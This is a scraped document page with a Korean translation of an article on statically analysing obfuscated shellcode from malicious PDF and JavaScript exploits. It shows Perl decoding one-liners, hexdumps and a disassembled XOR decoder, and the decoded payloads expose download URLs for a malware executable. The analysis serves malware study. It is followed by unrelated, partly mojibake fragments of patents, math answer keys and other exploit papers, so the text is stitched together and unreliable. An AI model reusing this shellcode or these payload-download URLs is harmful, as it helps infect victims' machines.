Microsoft Word - Static analysis of Shellcode.doc

Size: px
Start display at page:

Download "Microsoft Word - Static analysis of Shellcode.doc"

Transcription

1 Static analysis of Shellcode By By Maarten Van Horenbeeck 본문서에서는악성코드에서사용하는난독화되어있는쉘코드 를분석하는방법에대한 Maarten Van Horenbeeck 의글을번역 한것이다. Hacking Group OVERTIME OVERTIME force com>

2 Static analysis of Shellcode 두달전, ISC 핸들러인 Maarten Van Horenbeeck 는악성 PDF 파일에서 exploit 내용을추출하는방법에대한매우훌륭한내용을발표했다. 우리는이와같은악용을시도하는매우많은수의 PDF 또는 PDF- 파생품을보았다. 이문서에서는어떻게그들을해결하는지알아본다. Maarten 의발표내용을다시한번살펴보자보통, 악성코드섹션을추출하거나또는 inflating 할때마지막작업으로아래와같이정렬된 shellcode 를포함하는자바스크립트익스플로잇함수를만나게된다. 이와같은블록을풀기위해서간단한펄스크립트를사용할수있다. cat nasty.js perl - pe 's/\ %u(..)(..)/ chr(hex($2)).chr(hex($1))/ ge' hexdump - C more 이스크립트는 Unicode(%u ) 를실제출력가능한 ASCII 형태로변환한다. 대부분의 Unicode 블록은에셈블리어 (shellcode) 로되어있다. ASCII 로변환된내용은조금이상하게보인다. 이와같은이유로결과물을 hexdump 에넘겨준다. 하지만잠깐, 우리는 %u(hex) 를 ASCII 로변환했고그것을 Hexdump 에넘겼다. 이와같이하는이유는 %uxxyy 의바이트오더가변경된 (yy xx) 텍스트를얻기위해서이다. 그리고 hexdump C 또한 ASCII 를출력한다. ( 역자주 : 펄스크립트를보면 $2 가먼저나와서바이트오더를변경한다 ) b b5 cb ec e3 a4 64 b5 f3 ec µd.dµëì2.dã dµóì

3 eb 64 ec 2a b1 b2 2d e7 ef 07 1b b 2dëdì*±²-çï.." d 0a ba bd a3 a2 a0 a1 ef "...º½ ïhtt a 2f 2f 61 6f 6c 63 6f 75 6e e 63 p://aolcounter.c f 6d 2f a 6b 37 2f e om/4ezk7/exe.php b 0d 0a ");...var Y9Ib d b 0d uue = 0x400000;. 그리고주의깊게보면우리는다음단계로실제 exploit 이다운로드를시도하는 EXE 파일의이름을알수있다. ( 역자주 : / aolcounter.com/ 4eZk7/ exe.php 파일다운로드 ) 항상이처럼쉬운것만은아니다때때로다음단계의 URL 이인코딩되어있는경우도있다. 또다른 Shellcode 를살펴보자 이전과같은방식으로살펴보면 $ cat bad.js perl - pe 's/\ %u(..)(..)/ chr(hex($2)).chr(hex($1))/ ge' hexdump - C more c 6c 63 6f 64 var Shellcod

4 d 75 6e e=unescape(" c0 33 c9 eb 12 5e 66 b b fe 80 2e.3À3Éë.^f¹...þ e2 f7 eb 05 e8 e9 ff ff ff f4 b5..6.fâ ë.èéÿÿÿôµ b 0b 0b ac 3b 0b 0b 0b 96 4b 0f 96 7b 1f...bg ;...K..{ c0 3e e6 12 c1 1b 43 fd cc d6 10 0e e5 4b f6 >æ.á.cýw.ìö..åkö d0 fc ea e e f üf"xêa.a'.ài..v e0 61 1f 0e e e c8 b ce f3 5c 02 a..à...è adîó\ f ef f0 e6 ef 03 a e3...q.ïðæï....ã ed 7e b b a 7a 7a í~9%2{sww{e22zzz d e 68 6c 7d 6e rx}phg~hl}ns1t b 7e b 73 7b 42 qir2{~v2rxw1{s{b d e 6c 3d 3b 3b b 0b b 0a ; URL이보이지않는다. 누구나생각하는것처럼 URL은 Block안에있다. 대부분의 URL은일반적으로 / www 와같은형태로시작한다. 그래서만일우리가 abbcdeefff 와같이같은문자가반복되는형태의문자순서를본다면이것은대부분의경우인코딩된 URL 의시작패턴이다. 난독화를위해서사용되는가장기본적인방법은간단한 XOR 방식이다. 이와같은방식은이전문서에서다룬 XORSearch와같은툴을이용해서쉽게찾을수있다. ( 역자주 : Analyzing an obfuscated ANI exploit 문서참조 ) 이것은 XOR 형태가아니기때문에여기서는적용되지않는다. 그러면다음으로무엇을해야하는가? 두가지방법이있다. 하나는취약한시스템에서악

5 성코드를실행해서무엇을하는지알아내는것이고 ( 이와같은형태를 dynamic analysis 라고부른다 ), 또다른방법은유닉스 command line 이제공하는기능을이용해서단계별진행을통한 static analysis 를진행한다. 첫째로우리는쉘코드를유닉스디스어셈블러가이해할수있는형태로전환할필요가있다. 그렇게하기위해서우리는 형태로시작하는위의코드블락을 C 배열형태로변환해야한다. $ cat bad.bin perl - ne 's/ (.)/ printf "0x%02x,",ord($1)/ ge' > bad.c 변환하면아래와같다. 0x90,0x90,0x90,0x90,0x90,0x33,0xc0,0x33,0xc9,0xeb,0x12,0x5e,0x66... 아래와같은형태로전환한다. int main() { char foo[] = { 0x90,0x90,0x90,0x90,0x90,0x33,0xc0,0x33,0xc9,0xeb,0x12,0 x5e,0x66... }; } 컴파일한다. $ gcc - O0 - fno- inline bad.c - o bad.bin 디스어셈블가능한형태로변환한다 $ objdump - - disassembler- options=intel - D bad.bin 이작업의결과는 intel 어셈블리코드이다. 만일당신이악성코드리버스엔지니어링경험이있다면정확히 OllyDbg 사용경험이있다면해당코드를보는데어려움이없을것이다. 하지만그렇지않다면내용을이해하는것이힘들것이다. 어셈블리파일을살펴보다보면아래형태의코드블록을찾을수있을것이다. 4005a0: 90 nop 4005a1: 90 nop 4005a2: 90 nop 4005a3: 90 nop

6 4005a4: 90 nop 4005a5: 33 c0 xor eax,eax 4005a7: 33 c9 xor ecx,ecx 4005a9: eb 12 jmp 4005bd <C x1d> 4005ab: 5e pop rsi 4005ac: 66 b mov cx,0x b0: 8b fe mov edi,esi 4005b2: 80 2e 07 sub BYTE PTR [rsi],0x7 4005b5: xor BYTE PTR [rsi],0x4 4005b8: 46 e2 f7 rexxy loop 4005b2 <C x12> 이것은우리가쉘코드로부터얻은바이트순서이다. 내용을살펴보면블록의루프는 4 와 XOR 하기전에모든바이트에서 7 을뺀다. 확인해보자 cat bad.bin perl - pe 's/(.)/ chr((ord($1)- 7)^4)/ ge' hexdump - C c2 8d c2 8d c2 8d c2 8d c2 8d 28 c2 bd 28 c3 86 Â.Â.Â.Â.Â.(½(à c3 a0 0f 53 5b c2 b6 ff 80 8f bf bf bf bf bf bf Ã.S[ ÿ bf bf bf bd ff 80 8f bf bf bf bf bf bf bf bf bf ½ÿ b0 bf bf bf bf bf bf bf bf bf c2 8e 4e 0e c3 ac c3 Â.N.à à c0 ad c3 9b c3 ac ff 80 8f bf bf bf bf bf bf bf bf - Ã.à ÿ d0 bf b8 c2 98 ff 80 8f bf bf bf bf bf bf bf bf bf Â.ÿ e0 be c2 8a 0e 7e c3 98 c3 a a 2f ¾Â..~Ã.à s6./pht f a 2f 2f e 79 6f d tp:// e 69 6e 66 6f 2f b 2f search.info/psk/ f e f 62 3d 6d

7 out.php?b=mfsa d a 0a 결과물에서우리는다음단계에서사용되는 URL 을얻을수있다. 이와같은방식으로 URL 을찾기전에알아두어야할내용은모든쉘코드가 URL 을포함하고있는것은아니다. 그렇지만만일쉘코드에 URL 이포함되어있다면이와같은방식이많은도움이될것이다.

특허청구의 범위 청구항 1 앵커(20)를 이용한 옹벽 시공에 사용되는 옹벽패널에 있어서, 단위패널형태의 판 형태로 구성되며, 내부 중앙부가 후방 하부를 향해 기울어지도록 돌출 형성되어, 전면이 오 목하게 들어가고 후면이 돌출된 결속부(11)를 형성하되, 이 결속부(11

특허청구의 범위 청구항 1 앵커(20)를 이용한 옹벽 시공에 사용되는 옹벽패널에 있어서, 단위패널형태의 판 형태로 구성되며, 내부 중앙부가 후방 하부를 향해 기울어지도록 돌출 형성되어, 전면이 오 목하게 들어가고 후면이 돌출된 결속부(11)를 형성하되, 이 결속부(11 (51) Int. Cl. (19) 대한민국특허청(KR) (12) 등록특허공보(B1) E02D 29/02 (2006.01) E02D 17/20 (2006.01) E02B 3/14 (2006.01) (21) 출원번호 10-2010-0089517 (22) 출원일자 2010년09월13일 심사청구일자 (56) 선행기술조사문헌 JP2006037700 A* KR100920461

More information

ÃÖ»óÀ§5³ª-Á¤´ä(01~23)

ÃÖ»óÀ§5³ª-Á¤´ä(01~23) 2.4 3 5.26 8.225m 4523.3 8 0 36.63 3.26 46.7 4670-46.7=4523.3. _ 0. 3 422222 (_3) (_3) (_3) 422222. 4 5 _3 5 =5 _3 4 = _3+ _3+5=, _3=6 =2 ++=2++5=8 2.5 4 =2.5_4-7_.2=0-8.4=.6, 7.2 0.3 7.3 =0.3_7.3-.5_0.5.5

More information

기본서(상)해답Ⅰ(001~016)-OK

기본서(상)해답Ⅰ(001~016)-OK 1 1 01 01 (1) () 5 () _5 (4) _5_7 1 05 (5) { } 1 1 { } (6) _5 0 (1), 4 () 10, () 6, 5 0 (1) 18, 9, 6, 18 1,,, 6, 9, 18 01 () 1,,, 4, 4 1,,, 4, 6, 8, 1, 4 04 (1) () () (4) 1 (5) 05 (1) () () (4) 1 1 1 1

More information

Deok9_Exploit Technique

Deok9_Exploit Technique Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security

More information

: C, Y, =0, (Crook et al.(2007) ) ( ) 1 2 3 4 5 966 967 967 967 967 4,834 234 383 462 516 508 2,103 (A) 1 661 1,629 2,623 3,802 7,613 3,806 1,040 1,636 2,175 2,788 4,193 2,629 (B) 2,128 2,676 3,492

More information

버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습

버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습니다. 여러분모두 Windows 에서 hex editor(hex dump, hex viewer) 라는것을사용해보셨을겁니다. 바로바이너리파일을 16 진수

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file

More information

제 9 도는 6제어항목의 세팅목표의 보기가 표시된 레이더 챠트(radar chart). 제 10 도는 제 6 도의 함수블럭(1C)에서 사용되는 각종 개성화 함수의 보기를 표시하는 테이블. 제 11a 도 제 11c 도까지는 각종 조건에 따라 제공되는 개성화함수의 변화의

제 9 도는 6제어항목의 세팅목표의 보기가 표시된 레이더 챠트(radar chart). 제 10 도는 제 6 도의 함수블럭(1C)에서 사용되는 각종 개성화 함수의 보기를 표시하는 테이블. 제 11a 도 제 11c 도까지는 각종 조건에 따라 제공되는 개성화함수의 변화의 (19) 대한민국특허청(KR) (12) 특허공보(B1) (51) Int. Cl. 5 B66B 1/18 (45) 공고일자 1993년09월28일 (11) 공고번호 특1993-0009339 (21) 출원번호 특1989-0002580 (65) 공개번호 특1989-0014358 (22) 출원일자 1989년03월02일 (43) 공개일자 1989년10월23일 (30) 우선권주장

More information

(01-16)유형아작중1-2_스피드.ps

(01-16)유형아작중1-2_스피드.ps 01 p.10 0001 000 61 0003 4 8 3 4 5 7 4 3 3 3 6 8 9 5 1 1 3 7 9 6 0 1 0004 4 0005 0006 3 0007 6 0008 30 0009 3 19 0010 10 ~14 14 ~18 9 18 ~1 11 1 ~16 4 16 ~0 4 30 0011 160 cm 170 cm 001 10 cm 5 0013 135

More information

10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 -

10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 - 10 단원 : 도형의닮음 10-1 닮음도형 p265 ABC DEF ABC DEF EF B ABCD EFGH ABCD EFGH EF A AB GH ADFC CF KL 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 1 - 10-2 삼각형의닮음조건 p270 AD BE C ABC DE ABC 중 2 비상 10, 11 단원도형의닮음 (& 활용 ) - 2 -

More information

(001~007)수능기적(적통)부속

(001~007)수능기적(적통)부속 0 6 06. C : k d=k+c k «+-, : «d= «± +C + =- : d=: ;[!; d=l +C : kf()d=k: f()d k : { f()+g()} d=: f()d+: g()d : { f()-g()} d=: f()d-: g()d : si d=-cos +C : cos d=si+c 008 : sec d=ta +C : cosec d=-cot +C

More information

Microsoft Word - Reverse Engineering Code with IDA Pro-2-1.doc

Microsoft Word - Reverse Engineering Code with IDA Pro-2-1.doc Reverse Engineering Code with IDA Pro By Dan Kaminsky, Justin Ferguson, Jason Larsen, Luis Miras, Walter Pearce 정리 : vangelis(securityproof@gmail.com) 이글은 Reverse Engineering Code with IDA Pro(2008년출판

More information

본 발명은 중공코어 프리캐스트 슬래브 및 그 시공방법에 관한 것으로, 자세하게는 중공코어로 형성된 프리캐스트 슬래브 에 온돌을 일체로 구성한 슬래브 구조 및 그 시공방법에 관한 것이다. 이를 위한 온돌 일체형 중공코어 프리캐스트 슬래브는, 공장에서 제작되는 중공코어 프

본 발명은 중공코어 프리캐스트 슬래브 및 그 시공방법에 관한 것으로, 자세하게는 중공코어로 형성된 프리캐스트 슬래브 에 온돌을 일체로 구성한 슬래브 구조 및 그 시공방법에 관한 것이다. 이를 위한 온돌 일체형 중공코어 프리캐스트 슬래브는, 공장에서 제작되는 중공코어 프 (51) Int. Cl. E04B 5/32 (2006.01) (19)대한민국특허청(KR) (12) 등록특허공보(B1) (45) 공고일자 (11) 등록번호 (24) 등록일자 2007년03월12일 10-0693122 2007년03월05일 (21) 출원번호 10-2006-0048965 (65) 공개번호 (22) 출원일자 2006년05월30일 (43) 공개일자 심사청구일자

More information

(001~042)개념RPM3-2(정답)

(001~042)개념RPM3-2(정답) - 0 0 0 0 6 0 0 06 66 07 79 08 9 0 000 000 000 000 0 8+++0+7+ = 6 6 = =6 6 6 80+8+9+9+77+86 = 6 6 = =86 86 6 8+0++++6++ = 8 76 = = 8 80 80 90 00 0 + = 90 90 000 7 8 9 6 6 = += 7 +7 =6 6 0006 6 7 9 0 8

More information

PowerPoint Template

PowerPoint Template BoF 원정대서비스 목차 환경구성 http://www.hackerschool.org/hs_boards/zboard.php?id=hs_notice&no=1170881885 전용게시판 http://www.hackerschool.org/hs_boards/zboard.php?id=bof_fellowship Putty War game 2 LOB 란? 해커스쿨에서제공하는

More information

Vehicular Communications

Vehicular Communications Network Security and Policy 2014. 04. 28 Jae Dong Lee SeoulTech (jdlee731@seoultech.ac.kr) Table of Contents Java applet malicious code Packet Analyze Shell code Packet Analyze Web hacking Packet Analyze

More information

Microsoft Word - Heap_Spray.doc

Microsoft Word - Heap_Spray.doc Heap Spray 본문서는 최근 웹 브라우저를 이용한 공격에 사용되는 Heap Spray 기법에 대한 내용을 수록하였다. 관련 내용에 대하여 많은 도움이 되기 바란다. 문서 내용은 초보자도 쉽게 이해할 수 있도록 관련 내용에 대한 설명을 포함하였다. Hacking Group OVERTIME force< forceteam01@gmail.com > 2007.05.13

More information

목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF 개발환경및사용툴 Shellcode 작성하기... 4 가. cmd 쉘 ) 소스코드작성 ) 디스어셈블리 ) 어셈블리코드편집 간단

목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF 개발환경및사용툴 Shellcode 작성하기... 4 가. cmd 쉘 ) 소스코드작성 ) 디스어셈블리 ) 어셈블리코드편집 간단 기술문서 `09. 11. 02. 작성 Windows Buffer Overflow Attack 작성자 : 영남대학교정보보호연구학회 @Xpert 김슬예나 prehea@ynu.ac.kr 1 목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF... 3 2. 개발환경및사용툴... 3 3. Shellcode 작성하기... 4 가. cmd 쉘... 4

More information

<C3D1C1A4B8AE20303120B0E6BFECC0C720BCF620323030B9AE2E687770>

<C3D1C1A4B8AE20303120B0E6BFECC0C720BCF620323030B9AE2E687770> 1. 1. 1) 1. 경우의 수 주사위를 한 개를 던질 때, 다음 경우의 수 (1) 소수 4. 4. 4) 집에서 학교로 가는 버스는 3 개 노선, 지하철은 4 개 노선이 있다. 버스나 지하철을 이용하여 집 에서 학교로 가는 방법은 모두 몇 가지인가? (2) 5의 약수 2. 2. 2) 1~10 숫자에서 하나를 뽑을때, (1) 3의 배수 경우의수 5. 5. 5)

More information

Microsoft PowerPoint - chap07.ppt

Microsoft PowerPoint - chap07.ppt 2010-1학기 현대암호학 제Ⅱ부인증 박종혁 Tel: 970-6702 Email: jhpark1@snut.ac.kr 제7장일방향 해시 함수 목차 일방향 해시 함수 일방향 해시 함수의 응용 예 일방향 해시 함수의 예 일방향해시함수SHA-1 (512) 일방향 해시 함수로 해결할 수 없는 문제 7.0 주요 내용 범죄 수사에서는 지문을 이용하는 일이 있다. 특정인의

More information

1 1,.,

1 1,., ,.,. 7 86 0 70 7 7 7 74 75 76 77 78 79 70 7 7 7 75 74 7 7 7 70 79 78 77 76 75 74 7.,. x, x A(x ), B(x ) x x AB =x -x A{x } B{x } x >x AB =x -x B{x } A{x } x =[ -x(xæ0) -x (x

More information

Microsoft Word - poc_script1.doc

Microsoft Word - poc_script1.doc POC Hacker s dream Script #1 US-ASCII 방식의악성스크립트분석 HACKING GROUP OVERTIME OVERTIME woos55 55< wooshack55@gmail.com>2008. >2008.10 10.2.27 1. US_ASCII 로인코딩된스크립트디코딩하기. [2] 사이트참조 ASCIIExploit.exe d index.html

More information

(71) 출원인 나혜원 대구 달서구 도원동 1438 대곡사계절타운 305-1502 나혜리 대구 달서구 도원동 1438 대곡사계절타운 305-1502 (72) 발명자 나혜원 대구 달서구 도원동 1438 대곡사계절타운 305-1502 나혜리 대구 달서구 도원동 1438 대

(71) 출원인 나혜원 대구 달서구 도원동 1438 대곡사계절타운 305-1502 나혜리 대구 달서구 도원동 1438 대곡사계절타운 305-1502 (72) 발명자 나혜원 대구 달서구 도원동 1438 대곡사계절타운 305-1502 나혜리 대구 달서구 도원동 1438 대 (51) Int. Cl. (19) 대한민국특허청(KR) (12) 공개특허공보(A) E02D 17/20 (2006.01) E02B 3/12 (2006.01) E02D 3/10 (2006.01) (21) 출원번호 10-2008-0131302 (22) 출원일자 2008년12월22일 심사청구일자 전체 청구항 수 : 총 4 항 (54) 제직형 지오셀 2008년12월22일

More information

제 호 년 제67차 정기이사회, 고문 자문위원 추대 총동창회 집행부 임원 이사에게 임명장 수여 월 일(일) 년 월 일(일) 제 역대 최고액 모교 위해 더 확충해야 강조 고 문:고달익( 1) 김병찬( 1) 김지훈( 1) 강보성( 2) 홍경식( 2) 현임종( 3) 김한주( 4) 부삼환( 5) 양후림( 5) 문종채( 6) 김봉오( 7) 신상순( 8) 강근수(10)

More information

<4D F736F F D20B9D9C0CCB7B5B9D9C0CCB7AFBDBA5FBCF6C1A42E646F63>

<4D F736F F D20B9D9C0CCB7B5B9D9C0CCB7AFBDBA5FBCF6C1A42E646F63> Virut 바이러스공격 ASEC 분석 1 팀고흥환선임연구원 해마다접수되는악성코드의통계를보면대부분이인터넷웜또는트로이목마가대부분을차지하며, 파일에기생하는바이러스는그수가적어지는것이추세이다. 그도그럴것이최근의악성코드특징은개인의능력과시가아닌돈과연관되는악성코드작성이대부분이기때문이다. 그렇다면 Virut 바이러스가인터넷웜과트로이목마를제치고국내뿐만아니라해외에서도큰피해를입히고있는이유가무엇인지,

More information

int main(void) int a; int b; a=3; b=a+5; printf("a : %d \n", a); printf("b : %d \n", b); a b 3 a a+5 b &a(12ff60) &b(12ff54) 3 a 8 b printf(" a : %x \

int main(void) int a; int b; a=3; b=a+5; printf(a : %d \n, a); printf(b : %d \n, b); a b 3 a a+5 b &a(12ff60) &b(12ff54) 3 a 8 b printf( a : %x \ ? 1 int main(void) int a; int b; a=3; b=a+5; printf("a : %d \n", a); printf("b : %d \n", b); a b 3 a a+5 b &a(12ff60) &b(12ff54) 3 a 8 b printf(" a : %x \n", &a); printf(" b : %x \n", &b); * : 12ff60,

More information

< E20C6DFBFFEBEEE20C0DBBCBAC0BB20C0A7C7D12043BEF0BEEE20492E707074>

< E20C6DFBFFEBEEE20C0DBBCBAC0BB20C0A7C7D12043BEF0BEEE20492E707074> Chap #2 펌웨어작성을위한 C 언어 I http://www.smartdisplay.co.kr 강의계획 Chap1. 강의계획및디지털논리이론 Chap2. 펌웨어작성을위한 C 언어 I Chap3. 펌웨어작성을위한 C 언어 II Chap4. AT89S52 메모리구조 Chap5. SD-52 보드구성과코드메모리프로그래밍방법 Chap6. 어드레스디코딩 ( 매핑 ) 과어셈블리어코딩방법

More information

2 KAIST 1988,,KAIST MathLetter, 3,,, 3,, 3, 3,

2 KAIST 1988,,KAIST MathLetter, 3,,, 3,, 3, 3, (M 2 ) 2 KAIST 1988,,KAIST MathLetter, 3,,, 3,, 3, 3, 3,,, 2003 8, 4 1 7 11 8 12 26 2 39 21 40 22 54 23 67 24 80 3 93 31 n! 94 32 101 33 115 4 131 41 132 6 42 146 5 163 51 164 52 180 1 8 11 4 4?!,? 2??,?

More information

chap06.hwp

chap06.hwp 제 6 장대칭암호알고리즘 : AES 6.1 AES 6.1.1 AES 개요 1977년도에미국표준으로제정된 DES는지금까지큰허점이발견되지않았지만키길이가 56비트밖에되지않아현재의컴퓨팅기술로는쉽게전사공격을하여암호해독을할수있다. 따라서 1997년에새표준에대한작업을시작하여 2000년 10월에 AES(Advanced Encryption Standard) 라는새표준을채택하였다.

More information

02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C

02.Create a shellcode that executes /bin/sh Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes /bin/sh C 02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C language Assembly code Change permissions(seteuid())

More information

- 본사의 주소 : 경기도 수원시 팔달구 인계동 1122-12 - 전화번호 : 1544-1200 - 홈페이지 주소 : http://www.woorifinancial.co.kr (4) 회사 사업 영위의 근거가 되는 법률 - 여신전문금융업법 (5) 중소기업 해당 여부 -

- 본사의 주소 : 경기도 수원시 팔달구 인계동 1122-12 - 전화번호 : 1544-1200 - 홈페이지 주소 : http://www.woorifinancial.co.kr (4) 회사 사업 영위의 근거가 되는 법률 - 여신전문금융업법 (5) 중소기업 해당 여부 - 반 기 보 고 서 (제 22 기) 사업연도 2010년 01월 01일 2010년 06월 30일 부터 까지 금융위원회 한국거래소 귀중 2010 년 8 월 16 일 회 사 명 : 우리파이낸셜 대 표 이 사 : 이 병 재 본 점 소 재 지 : 경기도 수원시 팔달구 인계동 1122-12 (전 화) 1544-1200 (홈페이지) http://www.woorifinancial.co.kr

More information

CKKeyPro 적용가이드

CKKeyPro 적용가이드 3.20 사이버테러악성코드분석보고서 라온시큐어보안기술연구팀 작성일 : 2013. 03 페이지 : 1/15 Introduction 2013년 3월 20일오후, MBC, KBS, YTN, 농협, 신한은행, 제주은행전산망장애가동시에발생하였다. 피해기관들의호스트약 500여대에오류메시지가화면에나타났으며악성코드에감염된호스트는사용할수없는상태가되었다. 현재까지정확한침투경로가밝혀지지않고있다.

More information

저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할

저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할 저작자표시 - 비영리 - 변경금지 2.0 대한민국 이용자는아래의조건을따르는경우에한하여자유롭게 이저작물을복제, 배포, 전송, 전시, 공연및방송할수있습니다. 다음과같은조건을따라야합니다 : 저작자표시. 귀하는원저작자를표시하여야합니다. 비영리. 귀하는이저작물을영리목적으로이용할수없습니다. 변경금지. 귀하는이저작물을개작, 변형또는가공할수없습니다. 귀하는, 이저작물의재이용이나배포의경우,

More information

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx #include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의

More information

HWP Document

HWP Document CODE A00-B99 A00-A09 A00 KOR_TITLE 특정 감염성 및 기생충성 질환 창자 감염 질환 콜레라 A00.0 비브리오 콜레리 01 전형균에 의한 콜레라 A00.0 전형균에 의한 콜레라 A00.1 비브리오 콜레리 01 엘토르형균에 의한 콜레라 A00.1 엘토르형균에 의한 콜레라 A00.9 상세불명의 콜레라 A01 A01.0 장티푸스 장티푸스

More information

A C O N T E N T S A-132

A C O N T E N T S A-132 C O N T E N T S -2 SC2 Series -3 SC2 Series -4 SC2 Series SC2 B 40 B 100 S I SC2 B 40 B 100 RO R S I SC2-2 B 40 B 100 HOY R S I -5 SC2 R0 40 SW R0 SC2 R 40 SC2 Series SW RB SW R SC2-2 H0 40 SW H0 SC2-2

More information

금오공대 컴퓨터공학전공 강의자료

금오공대 컴퓨터공학전공 강의자료 C 프로그래밍프로젝트 Chap 14. 포인터와함수에대한이해 2013.10.09. 오병우 컴퓨터공학과 14-1 함수의인자로배열전달 기본적인인자의전달방식 값의복사에의한전달 val 10 a 10 11 Department of Computer Engineering 2 14-1 함수의인자로배열전달 배열의함수인자전달방식 배열이름 ( 배열주소, 포인터 ) 에의한전달 #include

More information

1 1. (,, ) ( ) (,,, )., 1 ( ), ( ) ( ) 30, ( ) , + 1%., 1.

1 1. (,, ) ( ) (,,, )., 1 ( ), ( ) ( ) 30, ( ) , + 1%., 1. 1 1. (,, ) ( ) (,,, )., 1 ( ), ( ) ( ) 30, ( ). 30. 1, + 1%., 1. 2 1 15. 1,., 1. 3., ( ),.,,,,,. 1 ( ( ) 2 10 ) 3. 2, 1. 1. 2., ( ) ( ), ( ) ( ) 3. 4. ( ) 2,. 4. 1.. 2.., 6. 2,.. 12 200% (, 1,.) 3. ( )

More information

untitled

untitled 시스템소프트웨어 : 운영체제, 컴파일러, 어셈블러, 링커, 로더, 프로그래밍도구등 소프트웨어 응용소프트웨어 : 워드프로세서, 스프레드쉬트, 그래픽프로그램, 미디어재생기등 1 n ( x + x +... + ) 1 2 x n 00001111 10111111 01000101 11111000 00001111 10111111 01001101 11111000

More information

Microsoft PowerPoint 웹 연동 기술.pptx

Microsoft PowerPoint 웹 연동 기술.pptx 웹프로그래밍및실습 ( g & Practice) 문양세강원대학교 IT 대학컴퓨터과학전공 URL 분석 (1/2) URL (Uniform Resource Locator) 프로토콜, 호스트, 포트, 경로, 비밀번호, User 등의정보를포함 예. http://kim:3759@www.hostname.com:80/doc/index.html URL 을속성별로분리하고자할경우

More information

파이널생명과학1해설OK

파이널생명과학1해설OK EBS EBS 00 Finl E d u c t i o n l B r o d c s t i n g S y s t e m CO A B A~C CHON CHONP N.5 % 86.5 % 5.... 5. 6.. 8. 9. 0..... 5. 6.. 8. 9. 0. X Y X X 6 G DNA DNA S (A) (B) G DNA DNA (A)=; ;=;6!; (B)=;

More information

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow

More information

Microsoft Word - building the win32 shellcode 01.doc

Microsoft Word - building the win32 shellcode 01.doc Win32 Attack 1. Local Shellcode 작성방법 By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com Abstract 이글은 MS Windows 환경에서 shellcode 를작성하는방법에대해서설명하고있다. Win32 는 *nix 환경과는사뭇다른 API 호출방식을사용하기때문에조금복잡하게둘러서 shellcode

More information

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서 커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드

More information

슬라이드 1

슬라이드 1 -Part3- 제 4 장동적메모리할당과가변인 자 학습목차 4.1 동적메모리할당 4.1 동적메모리할당 4.1 동적메모리할당 배울내용 1 프로세스의메모리공간 2 동적메모리할당의필요성 4.1 동적메모리할당 (1/6) 프로세스의메모리구조 코드영역 : 프로그램실행코드, 함수들이저장되는영역 스택영역 : 매개변수, 지역변수, 중괄호 ( 블록 ) 내부에정의된변수들이저장되는영역

More information

°ø±â¾Ð±â±â

